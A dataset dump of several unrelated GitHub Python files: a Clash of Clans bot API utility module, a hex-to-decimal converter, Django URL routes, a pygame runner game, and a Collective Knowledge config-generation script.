base64_b64decode\nfrom json import loads as json_loads\nfrom slowapi import Limiter\nfrom slowapi.util import get_remote_address\n\n\nlimiter = Limiter(key_func=get_remote_address, key_style=\"endpoint\")\n\ndef dynamic_limit(key: str):\n if key in {\"::1\", \"65.108.77.253\", \"85.10.200.219\"}:\n return \"1000/second\"\n return \"30/second\"\n\nIMAGE_CACHE = ExpiringDict()\n\nload_dotenv()\nclient = motor.motor_asyncio.AsyncIOMotorClient(os.getenv(\"LOOPER_DB_LOGIN\"))\nother_client = motor.motor_asyncio.AsyncIOMotorClient(os.getenv(\"DB_LOGIN\"))\nredis = aioredis.Redis(host='85.10.200.219', port=6379, db=0, password=os.getenv(\"REDIS_PW\"), retry_on_timeout=True, max_connections=25, retry_on_error=[redis.ConnectionError])\ncoc_client = coc.Client(key_count=100, key_names=\"DiscordBot\", throttle_limit=500, cache_max_size=0, load_game_data=coc.LoadGameData(always=False), raw_attribute=True, stats_max_size=0)\n\n\nclass DBClient():\n def __init__(self):\n self.usafam = other_client.get_database(\"usafam\")\n self.clans_db = self.usafam.get_collection(\"clans\")\n self.server_db = self.usafam.server\n\n collection_class = self.clans_db.__class__\n\n self.server_db: collection_class = self.usafam.server\n self.clans_db: collection_class = self.usafam.get_collection(\"clans\")\n self.banlist: collection_class = self.usafam.banlist\n\n self.player_search: collection_class = other_client.usafam.player_search\n\n self.looper = client.looper\n self.new_looper = client.new_looper\n\n self.legend_rankings: collection_class = self.new_looper.legend_rankings\n self.war_logs_db: collection_class = self.looper.war_logs\n self.player_stats_db: collection_class = self.new_looper.player_stats\n self.attack_db: collection_class = self.looper.warhits\n self.player_leaderboard_db: collection_class = self.new_looper.leaderboard_db\n self.player_history: collection_class = self.new_looper.get_collection(\"player_history\")\n\n self.clan_cache_db: collection_class = self.new_looper.clan_cache\n self.clan_wars: collection_class = self.looper.clan_war\n self.legend_history: collection_class = self.looper.legend_history\n self.base_stats: collection_class = self.looper.base_stats\n 
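# NOTE: each attribute below is an async Motor collection; a typical (hypothetical) read:\n        #   doc = await db_client.clan_stats.find_one({\"tag\": \"#2PP\"})  # illustrative tag value\n        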
self.capital: collection_class = self.looper.raid_weekends\n self.clan_stats: collection_class = self.new_looper.clan_stats\n self.rankings: collection_class = self.new_looper.rankings\n self.cwl_groups: collection_class = self.new_looper.cwl_group\n\n self.clan_history: collection_class = self.new_looper.clan_history\n self.clan_join_leave: collection_class = self.new_looper.clan_join_leave\n self.ranking_history: collection_class = client.ranking_history\n self.player_trophies: collection_class = self.ranking_history.player_trophies\n self.player_versus_trophies: collection_class = self.ranking_history.player_versus_trophies\n self.clan_trophies: collection_class = self.ranking_history.clan_trophies\n self.clan_versus_trophies: collection_class = self.ranking_history.clan_versus_trophies\n self.capital_trophies: collection_class = self.ranking_history.capital\n self.basic_clan: collection_class = self.looper.clan_tags\n\ndb_client = DBClient()\n\n\nasync def get_players(tags: list, use_cache=True):\n players = []\n tag_set = set(tags)\n\n if use_cache:\n cache_data = await redis.mget(keys=list(tag_set))\n else:\n cache_data = []\n\n for data in cache_data:\n if data is None:\n continue\n data = ujson.loads(data)\n tag_set.remove(data.get(\"tag\"))\n player = coc.Player(data=data, client=coc_client)\n players.append(player)\n\n tasks = []\n for tag in tag_set:\n task = asyncio.ensure_future(coc_client.get_player(tag))\n tasks.append(task)\n if tasks:\n responses = await asyncio.gather(*tasks, return_exceptions=True)\n for response in responses:\n if isinstance(response, coc.Player):\n players.append(response)\n return players\n\n\nasync def download_image(url: str):\n cached = IMAGE_CACHE.get(url)\n if cached is None:\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n image_data = await response.read()\n await session.close()\n image_bytes: bytes = image_data\n IMAGE_CACHE.ttl(url, image_bytes, 3600 * 4)\n else:\n image_bytes = cached\n return io.BytesIO(image_bytes)\n\ndef fix_tag(tag:str):\n tag = tag.replace('%23', '')\n tag = \"#\" + re.sub(r\"[^A-Z0-9]+\", \"\", tag.upper()).replace(\"O\", \"0\")\n return tag\n\ndef gen_season_date():\n end = coc.utils.get_season_end().replace(tzinfo=utc).date()\n month = end.month\n if end.month <= 9:\n month = f\"0{month}\"\n return f\"{end.year}-{month}\"\n\ndef gen_games_season():\n now = datetime.utcnow()\n month = now.month\n if month <= 9:\n month = f\"0{month}\"\n return f\"{now.year}-{month}\"\n\ndef gen_raid_date():\n now = datetime.utcnow().replace(tzinfo=utc)\n current_dayofweek = now.weekday()\n if (current_dayofweek == 4 and now.hour >= 7) or (current_dayofweek == 5) or (current_dayofweek == 6) or (\n current_dayofweek == 0 and now.hour < 7):\n if current_dayofweek == 0:\n current_dayofweek = 7\n fallback = current_dayofweek - 4\n raidDate = (now - timedelta(fallback)).date()\n return str(raidDate)\n else:\n forward = 4 - current_dayofweek\n raidDate = (now + timedelta(forward)).date()\n return str(raidDate)\n\nasync def token_verify(server_id: int, api_token: str, only_admin: bool = False):\n if api_token is None:\n raise HTTPException(status_code=403, detail=\"API Token is required\")\n server_lookup = [1103679645439754335]\n if not only_admin:\n server_lookup.append(server_id)\n results = await db_client.server_db.find({\"server\" : {\"$in\" : [server_id, 1103679645439754335]}}).to_list(length=None)\n tokens = [r.get(\"ck_api_token\") for r in results]\n if api_token not in tokens:\n raise 
HTTPException(status_code=403, detail=\"Invalid API token or cannot access this resource\")\n\nasync def get_keys(emails: list, passwords: list, key_names: str, key_count: int):\n total_keys = []\n\n for count, email in enumerate(emails):\n _keys = []\n password = passwords[count]\n\n session = aiohttp.ClientSession()\n\n body = {\"email\": email, \"password\": password}\n resp = await session.post(\"https://developer.clashofclans.com/api/login\", json=body)\n if resp.status == 403:\n raise RuntimeError(\n \"Invalid Credentials\"\n )\n\n resp_paylaod = await resp.json()\n ip = json_loads(base64_b64decode(resp_paylaod[\"temporaryAPIToken\"].split(\".\")[1] + \"====\").decode(\"utf-8\"))[\n \"limits\"][1][\"cidrs\"][0].split(\"/\")[0]\n\n resp = await session.post(\"https://developer.clashofclans.com/api/apikey/list\")\n keys = (await resp.json())[\"keys\"]\n _keys.extend(key[\"key\"] for key in keys if key[\"name\"] == key_names and ip in key[\"cidrRanges\"])\n\n for key in (k for k in keys if ip not in k[\"cidrRanges\"]):\n await session.post(\"https://developer.clashofclans.com/api/apikey/revoke\", json={\"id\": key[\"id\"]})\n\n print(len(_keys))\n while len(_keys) < key_count:\n data = {\n \"name\": key_names,\n \"description\": \"Created on {}\".format(datetime.now().strftime(\"%c\")),\n \"cidrRanges\": [ip],\n \"scopes\": [\"clash\"],\n }\n resp = await session.post(\"https://developer.clashofclans.com/api/apikey/create\", json=data)\n key = await resp.json()\n _keys.append(key[\"key\"][\"key\"])\n\n if len(keys) == 10 and len(_keys) < key_count:\n print(\"%s keys were requested to be used, but a maximum of %s could be \"\n \"found/made on the developer site, as it has a maximum of 10 keys per account. \"\n \"Please delete some keys or lower your `key_count` level.\"\n \"I will use %s keys for the life of this client.\", )\n\n if len(_keys) == 0:\n raise RuntimeError(\n \"There are {} API keys already created and none match a key_name of '{}'.\"\n \"Please specify a key_name kwarg, or go to 'https://developer.clashofclans.com' to delete \"\n \"unused keys.\".format(len(keys), key_names)\n )\n\n await session.close()\n for k in _keys:\n total_keys.append(k)\n\n print(len(total_keys))\n return (total_keys)\n\n\ndef create_keys(emails: list, passwords: list):\n done = False\n global API_KEYS\n while done is False:\n try:\n loop = asyncio.get_event_loop()\n keys = loop.run_until_complete(get_keys(emails=emails,\n passwords=passwords, key_names=\"test\", key_count=10))\n done = True\n\n return keys\n except Exception as e:\n print(e)\n\n\n\n\nleagues = [\"Legend League\", \"Titan League I\" , \"Titan League II\" , \"Titan League III\" ,\"Champion League I\", \"Champion League II\", \"Champion League III\",\n \"Master League I\", \"Master League II\", \"Master League III\",\n \"Crystal League I\",\"Crystal League II\", \"Crystal League III\",\n \"Gold League I\",\"Gold League II\", \"Gold League III\",\n \"Silver League I\",\"Silver League II\",\"Silver League III\",\n \"Bronze League I\", \"Bronze League II\", \"Bronze League III\", \"Unranked\"]","repo_name":"MagicTheDev/ClashKing","sub_path":"API/APIUtils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10086,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"54"} +{"seq_id":"70583372643","text":"def hexadecimalToDecimal(hexnum):\r\n length = len(hexnum)\r\n base = 1\r\n dec_val = 0\r\n for i in range(length - 1, -1, -1):\r\n if hexnum[i] >= '0' and hexnum[i] <= '9':\r\n 
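# ord('0') == 48, so ord(ch) - 48 maps '0'..'9' to 0..9; the branch below uses\r\n            # ord(ch) - 55 because ord('A') == 65 and 65 - 55 == 10\r\n            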
dec_val += (ord(hexnum[i]) - 48) * base\r\n base = base * 16\r\n elif hexnum[i] >= 'A' and hexnum[i] <= 'F':\r\n dec_val += (ord(hexnum[i]) - 55) * base\r\n base = base * 16\r\n return dec_val \r\n \r\n# Driver code\r\nif __name__ == '__main__': \r\n hexnum = input(\"Enter a Hexadecimal Value: \")\r\n print(hexnum,\":\",hexadecimalToDecimal(hexnum))\r\n","repo_name":"UTSAVS26/Python-Basics-1","sub_path":"hex_dec.py","file_name":"hex_dec.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"763496085","text":"from django.conf.urls import url\nfrom .views import (ProfileDetailView, ProfileEditView, SocialLinkCreateView, SocialLinkUpdateView,\n SocialLinkDeleteView, RegisterView, RegisterSuccessView, AccountActivationView, get_activation_link)\n\napp_name = 'oauth'\n\nurlpatterns = [\n url(r'^register/$', RegisterView.as_view(), name='register'),\n url(r'^register-success/$', RegisterSuccessView.as_view(), name='register-success'),\n url(r'^(?P[\\w]+)/get/$', get_activation_link, name='get-act-link'),\n url(r'^activate/(?P[0-9A-Za-z_\\-]+)/(?P[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',\n AccountActivationView.as_view(), name='activate'),\n url(r'^sociallink/add/$', SocialLinkCreateView.as_view(), name='link-add'),\n url(r'^(?P[\\w]+)/$', ProfileDetailView.as_view(), name='detail'),\n url(r'^(?P[\\w]+)/edit/$', ProfileEditView.as_view(), name='edit'),\n url(r'sociallink/(?P[\\w.-]+)-(?P[\\w]{2})/$', SocialLinkUpdateView.as_view(),\n name='link-edit'),\n url(r'sociallink/(?P[\\w.-]+)-(?P[\\w]{2})/delete/$', SocialLinkDeleteView.as_view(),\n name='link-delete'),\n]\n","repo_name":"ajatprabha/gymkhana","sub_path":"src/oauth/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"23260477192","text":"import pygame, sys\nfrom random import randint, choice\n\nclass Player(pygame.sprite.Sprite):\n\n def __init__(self):\n\n super().__init__()\n\n player_walk_1 = pygame.image.load('./static/graphics/player/player_walk_1.png').convert_alpha()\n\n player_walk_2 = pygame.image.load('./static/graphics/player/player_walk_2.png').convert_alpha()\n\n self.player_walk = [player_walk_1, player_walk_2]\n\n self.player_index = 0\n\n self.player_jump = pygame.image.load('./static/graphics/player/jump.png').convert_alpha()\n\n self.image = self.player_walk[self.player_index]\n\n self.rect = self.image.get_rect(midbottom = (80, 300))\n\n self.gravity = 0\n\n self.jump_sound = pygame.mixer.Sound('./static/audio/jump.mp3')\n\n self.jump_sound.set_volume(0.5)\n\n def player_input(self):\n\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_SPACE] and self.rect.bottom >= 300:\n\n self.gravity = -20\n\n self.jump_sound.play()\n\n def apply_gravity(self):\n\n self.gravity += 1\n\n self.rect.y += self.gravity\n\n if self.rect.bottom >= 300:\n\n self.rect.bottom = 300\n\n def animation_state(self):\n\n if self.rect.bottom < 300:\n\n self.image = self.player_jump\n\n else:\n\n self.player_index += 0.1\n\n if self.player_index >= len(self.player_walk):\n\n self.player_index = 0\n\n self.image = self.player_walk[int(self.player_index)]\n\n def update(self):\n\n self.player_input()\n\n self.apply_gravity()\n\n self.animation_state()\n\nclass Obstacle(pygame.sprite.Sprite):\n\n def __init__(self, type):\n\n super().__init__()\n\n if type == 'fly':\n\n fly_1 = 
pygame.image.load('./static/graphics/fly/fly1.png').convert_alpha() \n\n fly_2 = pygame.image.load('./static/graphics/fly/fly2.png').convert_alpha()\n\n self.frames = [fly_1, fly_2]\n\n y_pos = 210\n\n else:\n\n snail_1 = pygame.image.load('./static/graphics/snail/snail1.png').convert_alpha() \n\n snail_2 = pygame.image.load('./static/graphics/snail/snail2.png').convert_alpha()\n\n self.frames = [snail_1, snail_2]\n\n y_pos = 300 \n\n self.animation_index = 0\n \n self.image = self.frames[self.animation_index]\n \n self.rect = self.image.get_rect(midbottom = (randint(900, 1100), y_pos))\n\n def animation_state(self):\n\n self.animation_index += 0.1\n\n if self.animation_index >= len(self.frames):\n\n self.animation_index = 0\n \n self.image = self.frames[int(self.animation_index)]\n\n def update(self):\n\n self.animation_state()\n\n self.rect.x -= 6\n\n self.destroy()\n\n def destroy(self):\n\n if self.rect.x <= -100:\n \n self.kill()\n\ndef display_score():\n\n current_time = int(pygame.time.get_ticks() / 1000) - start_time\n\n score_surface = text_font.render(f'Score: {current_time}', False, (64, 64, 64, 64))\n\n score_rectangle = score_surface.get_rect(center = (400, 50))\n\n screen.blit(score_surface, score_rectangle)\n\n return current_time\n\ndef collision_sprite():\n\n if pygame.sprite.spritecollide(player.sprite, obstacle_group, False):\n\n obstacle_group.empty()\n\n return False\n \n else:\n\n return True\n\n# start pygame \n\npygame.init()\n\n# display surface\n\nscreen = pygame.display.set_mode((800, 400))\n\n# set title for a window\n\npygame.display.set_caption('Runner')\n\n# initialize clock to control framerate\n\nclock = pygame.time.Clock()\n\n# create sky and ground surfaces\n\nsky_surface = pygame.image.load('./static/graphics/sky.png').convert_alpha()\n\nground_surface = pygame.image.load('./static/graphics/ground.png').convert_alpha()\n\n# create a font surface \n\ntext_font = pygame.font.Font('./static/font/Pixeltype.ttf', 50)\n\n# Intro screen\n\nplayer_stand = pygame.image.load('./static/graphics/player/player_stand.png').convert_alpha()\n\nplayer_stand= pygame.transform.rotozoom(player_stand, 0, 2)\n\nplayer_stand_rectangle = player_stand.get_rect(center = (400, 200))\n\ngame_name = text_font.render('Pixel Runner', False, (111, 196, 169))\n\ngame_name_rectangle = game_name.get_rect(center = (400, 80))\n\n# messages \n\ngame_message = text_font.render('Press space to run', False, (111, 196, 169))\n\ngame_message_rectangle = game_message.get_rect(center = (400, 320))\n\n# activate game \n\ngame_active = False\n\n# start time counter \n\nstart_time = 0\n\n# set score \n\nscore = 0\n\n# set obstacle timer\n\nobstacle_timer = pygame.USEREVENT + 1\n\npygame.time.set_timer(obstacle_timer, 1500)\n\nsnail_animation_timer = pygame.USEREVENT + 2\n\npygame.time.set_timer(snail_animation_timer, 500)\n\nfly_animation_timer = pygame.USEREVENT + 3\n\npygame.time.set_timer(fly_animation_timer, 200)\n\n# background music \n\nbackground_music = pygame.mixer.Sound('./static/audio/music.wav')\n\nbackground_music.play(loops = -1)\n\n# groups \n\nplayer = pygame.sprite.GroupSingle()\n\nplayer.add(Player())\n\nobstacle_group = pygame.sprite.Group()\n\n# infinite loop to keep display running \n\nwhile True:\n\n # check for event\n\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n\n pygame.quit()\n\n sys.exit()\n\n if game_active:\n\n if event.type == obstacle_timer:\n\n obstacle_group.add(Obstacle(choice(['fly', 'snai', 'snail', 'snail'])))\n\n else:\n\n if event.type 
== pygame.KEYDOWN and event.key == pygame.K_SPACE:\n\n game_active = True\n\n start_time = int(pygame.time.get_ticks() / 1000)\n \n if game_active:\n\n # attach surfaces\n\n screen.blit(sky_surface, (0, 0))\n\n screen.blit(ground_surface, (0, 300))\n\n # get the score \n\n score = display_score()\n\n player.draw(screen)\n\n player.update()\n\n obstacle_group.draw(screen)\n\n obstacle_group.update()\n\n # collision \n\n game_active = collision_sprite()\n\n else:\n\n screen.fill((94, 129, 162))\n\n # manage player and obstacle position\n\n screen.blit(player_stand, player_stand_rectangle)\n\n screen.blit(game_name, game_name_rectangle)\n\n # score \n\n score_message = text_font.render(f'Your score: {score}', False, (111, 196, 169))\n\n score_message_rectangle = score_message.get_rect(center = (400, 330))\n\n if score == 0:\n\n screen.blit(game_message, game_message_rectangle)\n\n else:\n\n screen.blit(score_message, score_message_rectangle)\n\n # update frame\n\n pygame.display.update()\n\n # while loop will not run more than 60 times per second\n\n clock.tick(60)\n","repo_name":"faridisayev/Python-Runner-Game","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11473849322","text":"import sys\r\nimport os\r\n\r\nAPP_CONF_FILE = 'app.conf'\r\nCAFFE_ENGINE = 'caffe'\r\nTF_ENGINE = 'tf'\r\n\r\ndef ck_preprocess(i):\r\n if sys.version_info[0]>2:\r\n import configparser as cp\r\n else:\r\n import ConfigParser as cp\r\n\r\n # read existing desktop app config, if any\r\n conf = cp.ConfigParser()\r\n conf.read(APP_CONF_FILE)\r\n\r\n ck = i['ck_kernel']\r\n\r\n r = fill_general(ck, conf, i.get('params', {}))\r\n if r['return'] > 0: return r\r\n\r\n r = fill_models(ck, conf, 'Models', tags='caffemodel', exclude_tags=['ssd'], engine=CAFFE_ENGINE)\r\n if r['return'] > 0: return r\r\n\r\n r = fill_models(ck, conf, 'DetectionModels', 'caffemodel,ssd', engine=CAFFE_ENGINE)\r\n if r['return'] > 0: return r\r\n\r\n r = fill_models(ck, conf, 'DetectionModels', 'model,tensorflow,squeezedetmodel', engine=TF_ENGINE, start_count=len(r['lst']))\r\n if r['return'] > 0: return r\r\n\r\n host_os_dict = i.get('host_os_dict', {})\r\n host_os = host_os_dict.get('ck_name', '')\r\n exe_extension = ''\r\n if 'win' == host_os:\r\n exe_extension = '.exe'\r\n\r\n r = fill_programs(ck, conf, exe_extension, 'Programs', 'caffe-classification,continuous')\r\n if r['return'] > 0: return r\r\n\r\n r = fill_programs(ck, conf, exe_extension, 'DetectionPrograms', 'caffe-detection,continuous')\r\n if r['return'] > 0: return r\r\n\r\n r = fill_squeezedet(ck, conf, 'DetectionPrograms', start_count=len(r['lst']))\r\n if r['return'] > 0: return r\r\n\r\n r = fill_aux(ck, conf)\r\n if r['return'] > 0: return r\r\n\r\n r = fill_val(ck, conf, 'VAL', 'imagenet,val')\r\n if r['return'] > 0: return r\r\n\r\n r = fill_val(ck, conf, 'DetectionDatasets', 'object-detection,images')\r\n if r['return'] > 0: return r\r\n\r\n with open(APP_CONF_FILE, 'w') as f:\r\n conf.write(f)\r\n\r\n bat = ''\r\n if 'win' != host_os:\r\n misc = i.get('misc', {})\r\n path = misc.get('path', '')\r\n tmp_dir = misc.get('tmp_dir', '')\r\n if '' != path:\r\n ld_path = os.path.join(path, tmp_dir)\r\n bat ='export ' + host_os_dict.get('env_ld_library_path', 'LD_LIBRARY_PATH') +'=\"' + ld_path + '\"'\r\n\r\n return {'return':0, 'bat': bat, 'new_env': i['env']}\r\n\r\ndef setstr(conf, section, key, value):\r\n # string values must 
be enquoted for Qt to read them correctly\r\n conf.set(section, key, '\"' + value.replace('\\\\', '\\\\\\\\') + '\"')\r\n\r\ndef ensure_section(conf, section, clean=False):\r\n if clean:\r\n conf.remove_section(section)\r\n if not conf.has_section(section):\r\n conf.add_section(section)\r\n\r\ndef conf_set_from_params(conf, section, params, param_names):\r\n for param_name in param_names:\r\n if param_name in params:\r\n conf.set(section, param_name, str(params[param_name]))\r\n\r\ndef fill_general(ck, conf, params):\r\n section = 'General'\r\n ensure_section(conf, section)\r\n try:\r\n bin_path, bin_name = os.path.split(which('ck'))\r\n setstr(conf, section, 'ck_bin_path', bin_path)\r\n setstr(conf, section, 'ck_exe_name', bin_name)\r\n except WhichError:\r\n return {'return':1, 'error': 'Path to ck not found'}\r\n\r\n r = ck.access({'action': 'where', 'module_uoa': 'repo', 'data_uoa': 'local'})\r\n if r['return'] > 0: return r\r\n\r\n setstr(conf, section, 'ck_repos_path', os.path.dirname(r['path']))\r\n\r\n conf_set_from_params(conf, section, params, [\r\n 'fps_update_interval_ms',\r\n 'recognition_update_interval_ms',\r\n 'footer_right_text',\r\n 'footer_right_url',\r\n 'recognition_auto_restart'\r\n ])\r\n\r\n return {'return':0}\r\n\r\ndef meta_contain_tag(u, tags_to_check):\r\n utags = u.get('meta', {}).get('tags', [])\r\n for t in tags_to_check:\r\n if t in utags:\r\n return True\r\n return False\r\n\r\ndef find_by_tags(ck, tags, module='', exclude_tags=[]):\r\n search_dict = {'action': 'search', 'tags': tags, 'add_meta': 'yes'}\r\n if module != '':\r\n search_dict['module_uoa'] = module\r\n r = ck.access(search_dict)\r\n if r['return'] > 0: return r\r\n\r\n lst = [x for x in r['lst'] if not meta_contain_tag(x, exclude_tags)]\r\n\r\n for i, u in enumerate(lst):\r\n module_uoa = u['module_uoa']\r\n data_uoa = u['data_uoa']\r\n r = ck.access({'action': 'load', 'module_uoa': module_uoa, 'data_uoa': data_uoa})\r\n if r['return'] > 0: return r\r\n u['meta'] = r['dict']\r\n u['data_name'] = r['data_name']\r\n\r\n return {'return':0, 'lst': lst}\r\n\r\ndef fill_section(ck, conf, section, tags, module='', exclude_tags=[], start_count=0):\r\n r = find_by_tags(ck, tags=tags, module=module, exclude_tags=exclude_tags)\r\n if r['return'] > 0: return r\r\n\r\n ensure_section(conf, section, 0 == start_count)\r\n\r\n lst = r['lst']\r\n conf.set(section, 'count', str(len(lst) + start_count))\r\n\r\n for i, u in enumerate(lst):\r\n setstr(conf, section, str(i + start_count) + '_uoa', u['data_uoa'])\r\n setstr(conf, section, str(i + start_count) + '_name', u['data_name'])\r\n\r\n return {'return':0, 'lst': lst}\r\n\r\ndef fill_models(ck, conf, section, tags, exclude_tags=[], engine='', start_count=0):\r\n r = fill_section(ck, conf, section=section, tags=tags, module='env', exclude_tags=exclude_tags, start_count=start_count)\r\n if r['return'] > 0: return r\r\n\r\n lst = r['lst']\r\n for i, u in enumerate(lst):\r\n i = i + start_count\r\n setstr(conf, section, str(i) + '_engine', engine)\r\n\r\n return {'return':0, 'lst': lst}\r\n\r\ndef fill_programs(ck, conf, exe_extension, section, tags):\r\n import glob\r\n\r\n r = fill_section(ck, conf, section=section, tags=tags)\r\n if r['return'] > 0: return r\r\n lst = r['lst']\r\n for i, u in enumerate(lst):\r\n output_file = ck.get_by_flat_key({'dict': u, 'key': '##meta#run_cmds#use_continuous#run_time#run_cmd_out1'}).get('value', None)\r\n if not output_file:\r\n print('! 
Could not find output file for ' + u['data_uoa'])\r\n continue\r\n\r\n target_file = ck.get_by_flat_key({'dict': u, 'key': '##meta#target_file'}).get('value', None)\r\n if not target_file:\r\n print('! Could not find target file for ' + u['data_uoa'])\r\n continue\r\n\r\n if not target_file.endswith(exe_extension):\r\n target_file = target_file + exe_extension\r\n\r\n r = ck.access(['find', '--module_uoa=' + u['module_uoa'], '--data_uoa=' + u['data_uoa']])\r\n if r['return'] != 0:\r\n print('! Could not load program ' + u['data_uoa'] + ': ' + r['error'])\r\n continue\r\n\r\n program_path = r['path']\r\n is_webcam = 'webcam' in u.get('meta', {}).get('tags', [])\r\n\r\n target_dirs = glob.glob(os.path.join(program_path, 'tmp*'))\r\n if not target_dirs:\r\n print('! Program \"' + u['data_uoa'] + '\" is not compiled. For use it in desktop demo, please compile it first')\r\n continue\r\n\r\n target_paths = []\r\n target_names = []\r\n target_uoas = []\r\n\r\n for target_path in target_dirs:\r\n full_target_path = os.path.join(program_path, target_path)\r\n r = ck.load_json_file({'json_file': os.path.join(full_target_path, 'tmp-deps.json')})\r\n if r['return'] != 0:\r\n print('! Failed to load tmp-deps.json from ' + full_target_path + ': ' + r['error'])\r\n continue\r\n\r\n target_uoa = ck.get_by_flat_key({'dict': r['dict'], 'key': '##lib-caffe#uoa'}).get('value', None)\r\n if not target_uoa:\r\n print('! Not found Caffe lib env UOA for ' + full_target_path)\r\n continue\r\n\r\n target_caffe_name = ck.get_by_flat_key({'dict': r['dict'], 'key': '##lib-caffe#dict#data_name'}).get('value', None)\r\n if not target_caffe_name:\r\n print('! Not found Caffe lib data_name for ' + full_target_path)\r\n continue\r\n\r\n if target_caffe_name in target_names:\r\n print('! Duplicate Caffe lib \"' + target_caffe_name + '\", skipping directory ' + full_target_path)\r\n continue\r\n\r\n target_names.append(target_caffe_name)\r\n target_paths.append(os.path.basename(target_path))\r\n target_uoas.append(target_uoa)\r\n\r\n if not target_paths:\r\n print('! Program \"' + u['data_uoa'] + '\" is not compiled. For use it in desktop demo, please compile it first')\r\n continue\r\n\r\n setstr(conf, section, str(i) + '_path', program_path)\r\n setstr(conf, section, str(i) + '_output_file', output_file)\r\n setstr(conf, section, str(i) + '_exe', target_file)\r\n setstr(conf, section, str(i) + '_engine', CAFFE_ENGINE)\r\n conf.set(section, str(i) + '_webcam', str(1 if is_webcam else 0))\r\n\r\n conf.set(section, str(i) + '_target_count', str(len(target_paths)))\r\n for j, target_path in enumerate(target_paths):\r\n k = str(i) + '_target_' + str(j)\r\n setstr(conf, section, k + '_path', target_path)\r\n setstr(conf, section, k + '_name', target_names[j])\r\n setstr(conf, section, k + '_uoa', target_uoas[j])\r\n\r\n return {'return': 0, 'lst': lst}\r\n\r\ndef fill_aux(ck, conf):\r\n section = 'AUX'\r\n r = fill_section(ck, conf, section=section, tags='imagenet,aux', module='env')\r\n if r['return'] > 0: return r\r\n lst = r['lst']\r\n for i, u in enumerate(lst):\r\n package_uoa = u.get('meta', {}).get('package_uoa', '')\r\n if package_uoa == '':\r\n print('! 
There is no package_uoa for AUX env entry ' + u['data_uoa'])\r\n setstr(conf, section, str(i) + '_package_uoa', package_uoa)\r\n return {'return': 0}\r\n\r\ndef fill_val(ck, conf, section, tags):\r\n r = fill_section(ck, conf, section=section, tags=tags, module='env')\r\n if r['return'] > 0: return r\r\n lst = r['lst']\r\n for i, u in enumerate(lst):\r\n package_uoa = u.get('meta', {}).get('package_uoa', '')\r\n r = {}\r\n if package_uoa == '':\r\n print('! There is no package_uoa for VAL env entry ' + u['data_uoa'])\r\n else:\r\n r = ck.access({'action': 'load', 'module_uoa': 'package', 'data_uoa': package_uoa})\r\n setstr(conf, section, str(i) + '_name', r.get('data_name', ''))\r\n setstr(conf, section, str(i) + '_aux_package_uoa', r.get('dict', {}).get('aux_uoa', ''))\r\n return {'return': 0}\r\n\r\ndef fill_squeezedet(ck, conf, section, start_count):\r\n r = fill_section(ck, conf, section=section, tags='tensorflow,squeezedet,continuous', start_count=start_count)\r\n if r['return'] > 0: return r\r\n lst = r['lst']\r\n for i, u in enumerate(lst):\r\n i = i + start_count\r\n output_file = ck.get_by_flat_key({'dict': u, 'key': '##meta#run_cmds#use_continuous#run_time#run_cmd_out1'}).get('value', None)\r\n if None == output_file:\r\n print('! Could not find output file for ' + u['data_uoa'])\r\n else:\r\n setstr(conf, section, str(i) + '_output_file', output_file)\r\n setstr(conf, section, str(i) + '_exe', 'continuous.sh')\r\n\r\n r = ck.access(['find', '--module_uoa=' + u['module_uoa'], '--data_uoa=' + u['data_uoa']])\r\n if r['return'] != 0:\r\n print('! Could not load program ' + u['data_uoa'] + ': ' + r['error'])\r\n continue\r\n\r\n program_path = r['path']\r\n is_webcam = 'webcam' in u.get('meta', {}).get('tags', [])\r\n \r\n setstr(conf, section, str(i) + '_path', program_path)\r\n setstr(conf, section, str(i) + '_engine', TF_ENGINE)\r\n conf.set(section, str(i) + '_webcam', str(1 if is_webcam else 0))\r\n\r\n r = find_by_tags(ck, tags='lib,tensorflow', module='env')\r\n if r['return'] > 0: return r\r\n\r\n lst = r['lst']\r\n conf.set(section, str(i) + '_target_count', str(len(lst)))\r\n for j, u in enumerate(lst):\r\n k = str(i) + '_target_' + str(j)\r\n target = lst[j]\r\n setstr(conf, section, k + '_path', 'tmp')\r\n setstr(conf, section, k + '_name', target['data_name'])\r\n setstr(conf, section, k + '_uoa', target['data_uoa'])\r\n\r\n return {'return': 0}\r\n\r\n#\r\n# =============================================================================\r\n#\r\n\r\n# Copyright (c) 2002-2007 ActiveState Software Inc.\r\n# Author:\r\n# Trent Mick (TrentM@ActiveState.com)\r\n# Home:\r\n# http://trentm.com/projects/which/\r\n# \r\n# LICENSE: MIT\r\n# \r\n# Copyright (c) 2002-2005 ActiveState Corp.\r\n# \r\n# Permission is hereby granted, free of charge, to any person obtaining a\r\n# copy of this software and associated documentation files (the\r\n# \"Software\"), to deal in the Software without restriction, including\r\n# without limitation the rights to use, copy, modify, merge, publish,\r\n# distribute, sublicense, and/or sell copies of the Software, and to\r\n# permit persons to whom the Software is furnished to do so, subject to\r\n# the following conditions:\r\n# \r\n# The above copyright notice and this permission notice shall be included\r\n# in all copies or substantial portions of the Software.\r\n# \r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\r\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\r\n# MERCHANTABILITY, FITNESS FOR A 
